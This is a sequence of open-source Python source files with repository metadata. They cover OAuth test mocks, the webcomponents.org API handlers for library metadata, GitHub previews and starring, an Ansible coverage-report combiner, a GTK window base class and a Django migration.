buffer=BytesIO(response.encode('utf8')),
)
elif isinstance(response, (dict, list)):
response = HTTPResponse(request=request, code=200,
buffer=BytesIO(json.dumps(response).encode('utf8')),
headers={'Content-Type': 'application/json'},
)
response_callback(response)
def setup_oauth_mock(client, host, access_token_path, user_path,
token_type='Bearer',
token_request_style='post',
):
"""setup the mock client for OAuth
generates and registers two handlers common to OAuthenticators:
- create the access token (POST access_token_path)
- get the user info (GET user_path)
and adds a method for creating a new mock handler to pass to .authenticate():
client.handler_for_user(user)
where user is the user-model to be returned by the user request.
    Args:
        host (str): the host to mock (e.g. api.github.com)
        access_token_path (str): The path for the access token request (e.g. /access_token)
        user_path (str): The path for requesting the user model (e.g. /user)
        token_type (str): the token_type field for the provider
        token_request_style (str): 'post' for form-encoded token requests,
            'json' for a JSON request body
    """
client.oauth_codes = oauth_codes = {}
client.access_tokens = access_tokens = {}
def access_token(request):
"""Handler for access token endpoint
Checks code and allocates a new token.
Replies with JSON model for the token.
"""
assert request.method == 'POST', request.method
if token_request_style == 'json':
body = request.body.decode('utf8')
try:
body = json.loads(body)
except ValueError:
return HTTPResponse(request=request, code=400,
reason="Body not JSON: %r" % body,
)
else:
code = body['code']
else:
query = urlparse(request.url).query
if not query:
query = request.body.decode('utf8')
query = parse_qs(query)
if 'code' not in query:
return HTTPResponse(request=request, code=400,
reason="No code in access token request: url=%s, body=%s" % (
request.url, request.body,
)
)
code = query['code'][0]
if code not in oauth_codes:
return HTTPResponse(request=request, code=403,
reason="No such code: %s" % code,
)
# consume code, allocate token
token = uuid.uuid4().hex
user = oauth_codes.pop(code)
access_tokens[token] = user
return {
'access_token': token,
'token_type': token_type,
}
def get_user(request):
assert request.method == 'GET', request.method
auth_header = request.headers.get('Authorization')
if auth_header:
token = auth_header.split(None, 1)[1]
else:
query = parse_qs(urlparse(request.url).query)
if 'access_token' in query:
token = query['access_token'][0]
else:
return HTTPResponse(request=request, code=403,
reason='Missing Authorization header',
)
if token not in access_tokens:
return HTTPResponse(request=request, code=403,
reason='No such access token: %r' % token,
)
return access_tokens.get(token)
if isinstance(host, str):
hosts = [host]
else:
hosts = host
for host in hosts:
client.add_host(host, [
(access_token_path, access_token),
(user_path, get_user),
])
def handler_for_user(user):
"""Return a new mock RequestHandler
user should be the JSONable model that will ultimately be returned
from the get_user request.
"""
code = uuid.uuid4().hex
oauth_codes[code] = user
handler = Mock(spec=web.RequestHandler)
handler.get_argument = Mock(return_value=code)
handler.request = HTTPServerRequest(
method='GET',
uri='https://hub.example.com?code=%s' % code
)
handler.hub = Mock(server=Mock(base_url='/hub/'), base_url='/hub/')
return handler
client.handler_for_user = handler_for_user
def mock_handler(Handler, uri='https://hub.example.com', method='GET', **settings):
"""Instantiate a Handler in a mock application"""
application = web.Application(
hub=Mock(
base_url='/hub/',
server=Mock(
base_url='/hub/'
),
),
cookie_secret=os.urandom(32),
db=Mock(
rollback=Mock(return_value=None)
),
**settings
)
request = HTTPServerRequest(
method=method,
uri=uri,
connection=Mock(),
)
handler = Handler(
application=application,
request=request,
)
handler._transforms = []
return handler
async def no_code_test(authenticator):
"""Run a test to exercise no code in the request"""
handler = Mock(spec=web.RequestHandler)
handler.get_argument = Mock(return_value=None)
with pytest.raises(web.HTTPError) as exc:
        await authenticator.authenticate(handler)
assert exc.value.status_code == 400
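# --- Hedged usage sketch (not part of the original module) ---
# How the pieces above fit together in a test, assuming `authenticator` is an
# OAuthenticator configured against provider.example.com and `client` is the
# MockAsyncHTTPClient patched into it:
#
#     setup_oauth_mock(client, host='provider.example.com',
#                      access_token_path='/access_token',
#                      user_path='/user')
#     handler = client.handler_for_user({'login': 'somebody'})
#     user_info = await authenticator.authenticate(handler)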
|
NickolausDS/oauthenticator
|
oauthenticator/tests/mocks.py
|
Python
|
bsd-3-clause
| 8,314
|
from google.appengine.ext import ndb
from google.appengine.api import search
from google.appengine.api import urlfetch
import logging
import json
import re
import urllib
from urlparse import urlparse
import webapp2
from datamodel import Author, Library, Version, Content, Dependency, Status, Sitemap
import versiontag
import util
class SearchContents(webapp2.RequestHandler):
@ndb.toplevel
def get(self, terms):
self.response.headers['Access-Control-Allow-Origin'] = '*'
scoring = self.request.get('noscore', None) is None
include_results = self.request.get('noresults', None) is None
include_count = self.request.get('count', None) is not None
request_cursor = self.request.get('cursor', None)
if not include_results:
scoring = False
include_count = True
try:
limit = min(20, int(self.request.get('limit', 20)))
except ValueError:
self.response.set_status(400)
return
index = search.Index('repo')
cursor = search.Cursor(web_safe_string=request_cursor)
try:
      # number_found is only guaranteed accurate up to this many results.
accuracy = 2000 if include_count else None
sort_options = search.SortOptions(match_scorer=search.MatchScorer()) if scoring else None
query_options = search.QueryOptions(limit=limit, number_found_accuracy=accuracy, sort_options=sort_options, cursor=cursor)
search_results = index.search(search.Query(query_string=terms, options=query_options))
cursor = search_results.cursor
except search.QueryError:
self.response.set_status(400)
self.response.write('bad query')
return
count = search_results.number_found
if include_results:
result_futures = []
for result in search_results.results:
(owner, repo) = result.doc_id.split('/')
version = None
for field in result.fields:
if field.name == 'version':
version = field.value
break
library_key = ndb.Key(Library, Library.id(owner, repo))
result_futures.append(LibraryMetadata.brief_async(library_key, version, assume_latest=True))
results = []
for future in result_futures:
result = yield future
if result is None:
# Fixup count when we skip over incomplete entries.
count = count - 1
if result is not None:
results.append(result)
result = {
'cursor': cursor.web_safe_string if cursor and include_results else None,
}
if include_count:
result['count'] = count
if include_results:
result['results'] = results
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
class LibraryMetadata(object):
@staticmethod
@ndb.tasklet
def brief_async(library_key, tag=None, assume_latest=False):
metadata = yield LibraryMetadata.full_async(library_key, tag=tag, brief=True, assume_latest=assume_latest)
if metadata is None or metadata['status'] != Status.ready:
raise ndb.Return(None)
result = {
'owner': metadata['owner'],
'repo': metadata['repo'],
'version': metadata['version'],
'kind': metadata['kind'],
'description': metadata['description'],
'stars': metadata['stars'],
'subscribers': metadata['subscribers'],
'forks': metadata['forks'],
'updated_at': metadata['updated_at'],
'avatar_url': metadata['avatar_url'],
}
if 'dependency_count' in metadata:
result['dependency_count'] = metadata['dependency_count']
if 'npmFullPackage' in metadata:
result['npmFullPackage'] = metadata['npmFullPackage']
if 'npmPackage' in metadata:
result['npmPackage'] = metadata['npmPackage']
if not assume_latest:
result['latest_version'] = metadata['latest_version']
result['default_version'] = metadata['default_version']
raise ndb.Return(result)
@staticmethod
@ndb.tasklet
def full_async(library_key, tag=None, brief=False, assume_latest=False):
if assume_latest:
assert tag is not None
library_future = library_key.get_async()
if tag is None or not brief or not assume_latest:
versions_future = Library.versions_for_key_async(library_key)
if tag is None:
versions = yield versions_future
default_version = versiontag.default_version(versions)
version_key = None if len(versions) == 0 else ndb.Key(Library, library_key.id(), Version, default_version)
else:
version_key = ndb.Key(Library, library_key.id(), Version, tag)
if version_key is not None:
version_future = version_key.get_async()
bower_future = Content.get_by_id_async('bower', parent=version_key)
if not brief:
readme_future = Content.get_by_id_async('readme.html', parent=version_key)
library = yield library_future
if library is None or library.status == Status.suppressed:
raise ndb.Return(None)
result = {}
# Add NPM package fields
key = library_key.string_id()
if key.startswith('@'):
parts = key.split('/')
if parts[0] != '@@npm':
result['npmScope'] = parts[0]
result['npmFullPackage'] = key
else:
result['npmFullPackage'] = parts[1]
result['npmPackage'] = parts[1]
if library.migrated_from_bower:
result['migratedFromBower'] = True
elif library.npm_package:
result['migratedToNpm'] = library.npm_package
result['apiKey'] = key
result['kind'] = library.kind
result['status'] = library.status
if library.status != Status.ready:
if library.status == Status.error:
result['error'] = library.error
raise ndb.Return(result)
version = None
if version_key is not None:
version = yield version_future
if version is None:
raise ndb.Return(None)
result['spdx_identifier'] = library.spdx_identifier
result['version'] = version.key.id()
if version.status != Status.ready:
result['status'] = version.status
if version.status == Status.error:
result['error'] = version.error
raise ndb.Return(result)
if not brief or not assume_latest:
versions = yield versions_future
result['versions'] = versions
if len(versions) > 0:
result['default_version'] = versiontag.default_version(versions)
# Remove latest_version once deployed clients all use default_version
result['latest_version'] = versiontag.default_version(versions)
if not brief and library.participation is not None:
result['activity'] = json.loads(library.participation).get('all', [])
if not brief and library.contributors is not None:
contributors = []
raw = json.loads(library.contributors)
for contributor in raw:
contributors.append({
'login': contributor['login'],
'avatar_url': contributor['avatar_url'],
'contributions': contributor['contributions'],
})
result['contributors'] = contributors
if library.metadata is not None:
metadata = json.loads(library.metadata)
result['description'] = metadata.get('description', '')
result['subscribers'] = metadata.get('subscribers_count', 0)
result['stars'] = metadata.get('stargazers_count', 0)
result['forks'] = metadata.get('forks', 0)
result['open_issues'] = metadata.get('open_issues', 0)
result['updated_at'] = metadata.get('updated_at', 0)
result['owner'] = metadata['owner']['login']
result['avatar_url'] = metadata['owner'].get('avatar_url', '')
result['repo'] = metadata['name']
if metadata.get('homepage') and re.match(r'https?', metadata.get('homepage')):
result['homepage'] = metadata['homepage']
result['default_branch'] = metadata.get('default_branch', 'master')
if not brief:
readme = yield readme_future
result['readme'] = None if readme is None else readme.content
bower = yield bower_future
if bower is not None:
bower_json = bower.get_json()
dependencies = bower_json.get('dependencies', {})
result['dependency_count'] = len(dependencies)
result['bower'] = {
'license': bower_json.get('license', ''),
'dependencies': dependencies,
'keywords': bower_json.get('keywords', []),
'demos': bower_json.get('demos', {}),
'pages': bower_json.get('pages', {}),
}
if result.get('description', '') == '':
result['description'] = bower_json.get('description', '')
raise ndb.Return(result)
class GetCollections(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, version=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
library_key = ndb.Key(Library, Library.id(owner, repo))
if version is None:
version = yield Library.default_version_for_key_async(library_key)
if version is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, library_key.id(), Version, version)
collection_versions = yield Version.collections_for_key_async(version_key)
collection_futures = []
for collection_version in collection_versions:
collection_futures.append(LibraryMetadata.brief_async(collection_version.key.parent(), collection_version.key.id()))
collections = []
for future in collection_futures:
collection_result = yield future
if collection_result is not None:
collections.append(collection_result)
result = {
'results': collections,
'count': len(collections),
}
self.response.write(json.dumps(result))
class GetDependencies(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, version=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
library_key = ndb.Key(Library, Library.id(owner, repo))
if version is None:
version = yield Library.default_version_for_key_async(library_key)
if version is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, library_key.id(), Version, version)
bower = yield Content.get_by_id_async('bower', parent=version_key)
if bower is None:
self.response.set_status(404)
return
bower_json = bower.get_json()
bower_dependencies = bower_json.get('dependencies', {})
dependencies = []
version_futures = []
for name in bower_dependencies.keys():
dependency = Dependency.from_string(bower_dependencies[name])
if dependency is None:
continue
dependencies.append(dependency)
dependency_library_key = ndb.Key(Library, Library.id(dependency.owner, dependency.repo))
version_futures.append(Library.versions_for_key_async(dependency_library_key))
dependency_futures = []
for i, dependency in enumerate(dependencies):
versions = yield version_futures[i]
def matches(version, spec):
try:
return versiontag.match(version, spec)
except ValueError:
# FIXME: What other cases do we need to support here?
return False
while len(versions) > 0 and not matches(versions[-1], dependency.version):
versions.pop()
if len(versions) > 0:
dependency_library_key = ndb.Key(Library, Library.id(dependency.owner.lower(), dependency.repo.lower()))
dependency_futures.append(LibraryMetadata.brief_async(dependency_library_key, versions[-1]))
results = []
for future in dependency_futures:
dependency_result = yield future
if dependency_result is not None:
results.append(dependency_result)
result = {
'results': results,
'count': len(results),
}
self.response.write(json.dumps(result))
class GetMetadata(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
owner = owner.lower()
repo = repo.lower()
library_key = ndb.Key(Library, Library.id(owner, repo))
result = yield LibraryMetadata.full_async(library_key, ver)
if result is None:
self.response.set_status(404)
else:
self.response.headers['Content-Type'] = 'application/json'
if result['status'] != Status.ready:
self.response.set_status(400)
self.response.write(json.dumps(result))
class GetDocs(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver=None):
use_analyzer_data = self.request.get('use_analyzer_data', None) is not None
self.response.headers['Access-Control-Allow-Origin'] = '*'
owner = owner.lower()
repo = repo.lower()
library_key = ndb.Key(Library, Library.id(owner, repo))
if ver is None:
ver = yield Library.default_version_for_key_async(library_key)
if ver is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, Library.id(owner, repo), Version, ver)
analysis = Content.get_by_id('analysis', parent=version_key, read_policy=ndb.EVENTUAL_CONSISTENCY)
if analysis is None:
self.response.set_status(404)
return
self.response.headers['Content-Type'] = 'application/json'
result = {}
result['status'] = analysis.status
if analysis.status == Status.ready:
content = analysis.get_json()
has_analyzer_data = content.get('analyzerData', None) is not None
if use_analyzer_data and has_analyzer_data:
# Use the analyzer data fields
result['analysis'] = content['analyzerData']
else:
# Use the hydrolysis fields and delete the analyzer ones
if has_analyzer_data:
del content['analyzerData']
result['content'] = content
if analysis.status == Status.error:
result['error'] = analysis.error
if result['status'] != Status.ready:
self.response.set_status(400)
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
class GetPage(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver, path):
self.response.headers['Access-Control-Allow-Origin'] = '*'
version_key = ndb.Key(Library, Library.id(owner, repo), Version, ver)
if version_key is None:
self.response.set_status(404)
self.response.write('Invalid repo/version')
return
page = Content.get_by_id('page-' + path, parent=version_key, read_policy=ndb.EVENTUAL_CONSISTENCY)
if page is None:
self.response.set_status(404)
self.response.write('Cannot find page %s' % path)
return
self.response.write(page.content)
class GetAuthor(webapp2.RequestHandler):
@ndb.toplevel
def get(self, author):
self.response.headers['Access-Control-Allow-Origin'] = '*'
author_object = Author.get_by_id(author.lower())
if author_object is None or author_object.status != Status.ready:
self.response.set_status(404)
return
metadata = json.loads(author_object.metadata)
result = {
'type': metadata['type'],
'login': metadata['login'],
'name': metadata['name'],
'company': metadata['company'],
'blog': metadata['blog'],
'location': metadata['location'],
'email': metadata['email'],
'bio': metadata['bio'],
'avatar_url': metadata['avatar_url'],
'followers': metadata['followers'],
'following': metadata['following'],
'public_gists': metadata['public_gists'],
'public_repos': metadata['public_repos'],
}
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
def exchange_token(handler):
code = handler.request.get('code')
# Exchange code for an access token from Github
headers = {'Accept': 'application/json'}
access_token_url = 'https://github.com/login/oauth/access_token'
params = {
'client_id': util.SECRETS['github_client_id'],
'client_secret': util.SECRETS['github_client_secret'],
'code': code
}
access_response = urlfetch.fetch(access_token_url, payload=urllib.urlencode(params), headers=headers, method='POST', validate_certificate=True)
access_token_response = json.loads(access_response.content)
if access_response.status_code != 200 or not access_token_response or access_token_response.get('error'):
handler.response.set_status(401)
handler.response.write('Authorization failed')
return None
return access_token_response['access_token']
class StarRepo(webapp2.RequestHandler):
def post(self, owner, repo):
self.response.headers['Access-Control-Allow-Origin'] = '*'
access_token = exchange_token(self)
if access_token is None:
return
starred = util.github_request('user/starred', owner, repo, access_token=access_token, method='GET')
# Check if repository is already starred
    if starred.status_code == 204:
self.response.set_status(202)
return
util.github_request('user/starred', owner, repo, access_token=access_token, method='PUT')
self.response.set_status(204)
class RegisterPreview(webapp2.RequestHandler):
def post(self):
full_name = self.request.get('repo').lower()
split = full_name.split('/')
if len(split) != 2:
self.response.set_status(400)
self.response.write('Bad request, not repo')
return
owner = split[0]
repo = split[1]
access_token = exchange_token(self)
if access_token is None:
return
# Validate access token against repo
repos_response = util.github_get('repos/%s' % full_name, access_token=access_token)
if repos_response.status_code != 200:
self.response.set_status(401)
self.response.write('Cannot access repo')
return
info = json.loads(repos_response.content)
has_access = info['permissions']['admin']
if not has_access:
self.response.set_status(401)
self.response.write('Do not have access to the repo')
return
parsed_url = urlparse(self.request.url)
params = {'name': 'web', 'events': ['pull_request']}
params['config'] = {
'url': '%s://%s/api/preview-event' % (parsed_url.scheme, parsed_url.netloc),
'content_type': 'json',
}
# Check if the webhook exists
list_webhooks_response = util.github_post('repos', owner, repo, 'hooks', access_token=access_token)
if list_webhooks_response.status_code != 200:
logging.error('Unable to query existing webhooks, continuing anyway. Github %s: %s',
list_webhooks_response.status_code, list_webhooks_response.content)
else:
webhooks = json.loads(list_webhooks_response.content)
for webhook in webhooks:
if webhook['active'] and webhook['config'] == params['config']:
self.response.write('Webhook is already configured')
return
# Create the webhook
create_webhook_response = util.github_post('repos', owner, repo, 'hooks', params, access_token)
if create_webhook_response.status_code != 201:
self.response.set_status(500)
self.response.write('Failed to create webhook.')
logging.error('Failed to create webhook. Github %s: %s',
create_webhook_response.status_code, create_webhook_response.content)
return
# Trigger shallow ingestion of the library so we can store the access token.
util.new_task(util.ingest_webhook_task(owner, repo), params={'access_token': access_token}, target='manage')
self.response.write('Created webhook')
class PreviewEvent(webapp2.RequestHandler):
def post(self):
if self.request.headers.get('X-Github-Event') != 'pull_request':
self.response.set_status(202) # Accepted
self.response.write('Payload was not for a pull_request, aborting.')
return
payload = json.loads(self.request.body)
if payload['action'] != 'opened' and payload['action'] != 'synchronize':
self.response.set_status(202) # Accepted
self.response.write('Payload was not opened or synchronize, aborting.')
return
# Original repo
origin_owner = payload['repository']['owner']['login']
origin_repo = payload['repository']['name']
origin_full_name = payload['repository']['full_name']
# Repo where the pull request came from.
pull_owner = payload['pull_request']['head']['repo']['owner']['login']
pull_repo = payload['pull_request']['head']['repo']['name']
key = ndb.Key(Library, Library.id(origin_owner, origin_repo))
library = key.get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if library is None:
logging.error('No library object found for %s', origin_full_name)
self.response.set_status(400) # Bad request
self.response.write('It does not seem like this repository was registered')
return
sha = payload['pull_request']['head']['sha']
parsed_url = urlparse(self.request.url)
params = {
'state': 'success',
'target_url': '%s://%s/preview/%s/%s/%s' % (parsed_url.scheme, parsed_url.netloc, pull_owner, pull_repo, sha),
'description': 'Preview is ready!', # TODO: Don't lie
'context': 'webcomponents/preview'
}
response = util.github_post('repos', origin_owner, origin_repo, 'statuses/%s' % sha, params, library.github_access_token)
if response.status_code != 201:
logging.error('Failed to set status on Github PR. Github returned %s:%s', response.status_code, response.content)
self.response.set_status(500)
self.response.write('Failed to set status on PR.')
return
pull_request_url = payload['pull_request']['url']
util.new_task(util.ingest_preview_task(pull_owner, pull_repo), params={'commit': sha, 'url': pull_request_url}, target='manage')
def validate_captcha(handler):
recaptcha = handler.request.get('recaptcha')
params = {
'secret': util.SECRETS['recaptcha'],
'response': recaptcha,
'remoteip': handler.request.remote_addr,
}
response = urlfetch.fetch('https://www.google.com/recaptcha/api/siteverify', payload=urllib.urlencode(params), method='POST', validate_certificate=True)
if not json.loads(response.content).get('success', False):
handler.response.set_status(403)
return False
return True
class PreviewCommit(webapp2.RequestHandler):
def post(self):
if not validate_captcha(self):
return
url = self.request.get('url')
match = re.match(r'https://github.com/(.*?)/([^/]*)(.*)', url)
    if match is None:
      self.response.set_status(400)
      self.response.write('Unable to understand url (%s)' % url)
      return
owner = match.group(1)
repo = match.group(2)
tail = match.group(3)
# SHA already defined
match = re.match(r'.*commits?/(.*)', tail)
if match:
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
self.response.write('%s/%s/%s' % (owner, repo, match.group(1)))
util.new_task(util.ingest_preview_task(owner, repo), params={'commit': match.group(1), 'url': url}, target='manage')
return
# Resolve SHA using these patterns and Github API
tail = re.sub(r'/pull/(.*)', r'pull/\1/head', tail)
tail = re.sub(r'/tree/(.*)', r'heads/\1', tail)
tail = re.sub(r'^$', r'heads/master', tail)
if not tail:
self.response.set_status(400)
self.response.write('Unable to understand url (%s)' % url)
return
response = util.github_get('repos', owner, repo, 'git/refs/' + tail)
if response.status_code == 404:
self.response.set_status(400)
self.response.write('Error resolving url (%s)' % url)
return
refs = json.loads(response.content)
if 'object' not in refs or 'sha' not in refs['object']:
self.response.set_status(400)
self.response.write('Error determining SHA from url (%s)' % url)
return
sha = json.loads(response.content)['object']['sha']
util.new_task(util.ingest_preview_task(owner, repo), params={'commit': sha, 'url': url}, target='manage')
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
self.response.write('%s/%s/%s' % (owner, repo, sha))
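# --- Hedged illustration (not part of the original module) ---
# The tail rewrites above map GitHub URL suffixes onto git ref paths before
# the refs API lookup, e.g.:
#   '/pull/42'        -> 'pull/42/head'
#   '/tree/my-branch' -> 'heads/my-branch'
#   ''  (bare repo)   -> 'heads/master'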
class PublishLibrary(webapp2.RequestHandler):
def post(self, library):
if not validate_captcha(self):
return
split = library.split('/')
    if len(split) == 2:
      scope = split[0]
      package = split[1]
    elif len(split) == 1:
scope = '@@npm'
package = library
else:
self.response.set_status(400)
self.response.write('Invalid name')
return
# TODO: validate valid repo and return result
task_url = util.ingest_library_task(scope, package)
util.new_task(task_url, target='manage')
class GetSitemap(webapp2.RequestHandler):
def get(self, kind):
if kind not in ['elements', 'collections', 'authors']:
self.response.set_status(404)
return
sitemap = Sitemap.get_by_id(kind)
if sitemap is None:
self.response.set_status(404)
return
prefix = {
'elements': '/element/',
'collections': '/collection/',
'authors': '/author/',
}[kind]
parsed_url = urlparse(self.request.url)
host = '%s://%s' % (parsed_url.scheme, parsed_url.netloc)
self.response.headers['Content-Type'] = 'text/plain'
self.response.write('\n'.join(['%s%s%s' % (host, prefix, page) for page in sitemap.pages]))
# pylint: disable=invalid-name
app = webapp2.WSGIApplication([
webapp2.Route(r'/api/publish/<library:([^\/]+|@?[^\/]+\/[^\/]+)>', handler=PublishLibrary),
webapp2.Route(r'/api/preview', handler=RegisterPreview),
webapp2.Route(r'/api/preview-event', handler=PreviewEvent),
webapp2.Route(r'/api/preview-commit', handler=PreviewCommit),
webapp2.Route(r'/api/meta/<author>', handler=GetAuthor),
webapp2.Route(r'/api/meta/<owner>/<repo>', handler=GetMetadata),
webapp2.Route(r'/api/meta/<owner>/<repo>/<ver>', handler=GetMetadata),
webapp2.Route(r'/api/docs/<owner>/<repo>', handler=GetDocs),
webapp2.Route(r'/api/docs/<owner>/<repo>/<ver>', handler=GetDocs),
webapp2.Route(r'/api/page/<owner>/<repo>/<ver>/<path:.*>', handler=GetPage),
webapp2.Route(r'/api/dependencies/<owner>/<repo>', handler=GetDependencies),
webapp2.Route(r'/api/dependencies/<owner>/<repo>/<version>', handler=GetDependencies),
webapp2.Route(r'/api/collections/<owner>/<repo>', handler=GetCollections),
webapp2.Route(r'/api/collections/<owner>/<repo>/<version>', handler=GetCollections),
webapp2.Route(r'/api/search/<terms>', handler=SearchContents),
webapp2.Route(r'/api/sitemap/<kind>.txt', handler=GetSitemap),
webapp2.Route(r'/api/star/<owner>/<repo>', handler=StarRepo),
], debug=True)
|
webcomponents/webcomponents.org
|
src/api.py
|
Python
|
apache-2.0
| 26,875
|
"""Combine integration test target code coverage reports."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from .... import types as t
from . import (
CoverageAnalyzeTargetsConfig,
get_target_index,
make_report,
read_report,
write_report,
)
if t.TYPE_CHECKING:
from . import (
Arcs,
Lines,
TargetIndexes,
)
def command_coverage_analyze_targets_combine(args): # type: (CoverageAnalyzeTargetsCombineConfig) -> None
"""Combine integration test target code coverage reports."""
combined_target_indexes = {} # type: TargetIndexes
combined_path_arcs = {} # type: Arcs
combined_path_lines = {} # type: Lines
for report_path in args.input_files:
covered_targets, covered_path_arcs, covered_path_lines = read_report(report_path)
merge_indexes(covered_path_arcs, covered_targets, combined_path_arcs, combined_target_indexes)
merge_indexes(covered_path_lines, covered_targets, combined_path_lines, combined_target_indexes)
report = make_report(combined_target_indexes, combined_path_arcs, combined_path_lines)
write_report(args, report, args.output_file)
def merge_indexes(
source_data, # type: t.Dict[str, t.Dict[t.Any, t.Set[int]]]
source_index, # type: t.List[str]
combined_data, # type: t.Dict[str, t.Dict[t.Any, t.Set[int]]]
combined_index, # type: TargetIndexes
): # type: (...) -> None
"""Merge indexes from the source into the combined data set (arcs or lines)."""
for covered_path, covered_points in source_data.items():
combined_points = combined_data.setdefault(covered_path, {})
for covered_point, covered_target_indexes in covered_points.items():
combined_point = combined_points.setdefault(covered_point, set())
for covered_target_index in covered_target_indexes:
combined_point.add(get_target_index(source_index[covered_target_index], combined_index))
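# --- Hedged illustration (not part of the original module) ---
# A tiny concrete run of merge_indexes: two reports covering the same arc in
# the same file end up sharing one combined entry. This assumes
# get_target_index assigns indexes in first-seen order; names are made up.
#
#     combined_index = {}
#     combined = {}
#     merge_indexes({'lib.py': {(1, 2): {0}}}, ['target_a'], combined, combined_index)
#     merge_indexes({'lib.py': {(1, 2): {0}}}, ['target_b'], combined, combined_index)
#     # combined == {'lib.py': {(1, 2): {0, 1}}}
#     # combined_index == {'target_a': 0, 'target_b': 1}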
class CoverageAnalyzeTargetsCombineConfig(CoverageAnalyzeTargetsConfig):
"""Configuration for the `coverage analyze targets combine` command."""
def __init__(self, args): # type: (t.Any) -> None
super(CoverageAnalyzeTargetsCombineConfig, self).__init__(args)
self.input_files = args.input_file # type: t.List[str]
self.output_file = args.output_file # type: str
|
roadmapper/ansible
|
test/lib/ansible_test/_internal/coverage/analyze/targets/combine.py
|
Python
|
gpl-3.0
| 2,420
|
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
from gi.repository import Gtk
from gi.repository import GObject
from . helpers import get_builder, show_uri, get_help_uri
# This class is meant to be subclassed by FirstbootWindow. It provides
# common functions and some boilerplate.
class Window(Gtk.Window):
__gtype_name__ = "Window"
    # To construct a new instance of this class, the following notable
    # methods are called in this order:
# __new__(cls)
# __init__(self)
# finish_initializing(self, builder)
# __init__(self)
#
# For this reason, it's recommended you leave __init__ empty and put
# your initialization code in finish_initializing
def __init__(self):
GObject.GObject.__init__(self)
def __new__(cls):
"""Special static method that's automatically called by Python when
constructing a new instance of this class.
Returns a fully instantiated BaseFirstbootWindow object.
"""
builder = get_builder(cls.__gtype_name__)
new_object = builder.get_object(cls.__gtype_name__)
new_object._finish_initializing(builder)
return new_object
def _finish_initializing(self, builder):
"""Called while initializing this instance in __new__
finish_initializing should be called after parsing the UI definition
and creating a FirstbootWindow object with it in order to finish
initializing the start of the new FirstbootWindow instance.
"""
# Get a reference to the builder and set up the signals.
self.builder = builder
self.ui = builder.get_ui(self, True)
self.connect("delete_event", self.on_delete_event)
self.translate()
self.finish_initializing(builder)
def finish_initializing(self, builder):
pass
def on_destroy(self, widget, data=None):
"""Called when the FirstbootWindow is closed."""
# Clean up code for saving application state should be added here.
Gtk.main_quit()
def on_delete_event(self, widget, data=None):
return False
    def translate(self):
        pass
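
# --- Hedged usage sketch (not part of the original module) ---
# How a subclass is expected to hook in; "FirstbootWindow" must match a UI
# definition that get_builder() can load, and "main_label" is a made-up
# widget id.
#
#     class FirstbootWindow(Window):
#         __gtype_name__ = "FirstbootWindow"
#
#         def finish_initializing(self, builder):
#             # runs after the UI definition is parsed and signals are wired
#             self.label = builder.get_object("main_label")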
|
gecos-team/gecosws-agent
|
gecosfirstlogin_lib/Window.py
|
Python
|
gpl-2.0
| 3,073
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-26 21:26
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('todo', '0008_auto_20160126_0004'),
]
operations = [
migrations.AddField(
model_name='todolist',
name='list_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='item',
name='creation_date',
field=models.DateTimeField(default=datetime.datetime(2016, 1, 26, 14, 26, 31, 705576), verbose_name='date created'),
),
migrations.AlterField(
model_name='todolist',
name='creation_date',
field=models.DateTimeField(default=datetime.datetime(2016, 1, 26, 14, 26, 31, 704075), verbose_name='date created'),
),
]
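
# --- Hedged note (not part of the generated migration) ---
# The hard-coded datetime defaults above are what Django writes when a model
# field's default was *evaluated* at makemigrations time, e.g.
# datetime.datetime.now(); passing the callable instead keeps
# "date created" current per row:
#
#     from django.utils import timezone
#     creation_date = models.DateTimeField(default=timezone.now,
#                                          verbose_name='date created')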
|
akmcinto/TodoApp
|
ToDoApp/todo/migrations/0009_auto_20160126_1426.py
|
Python
|
apache-2.0
| 1,146
|
# Copyright (c) 2015 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_concurrency import processutils
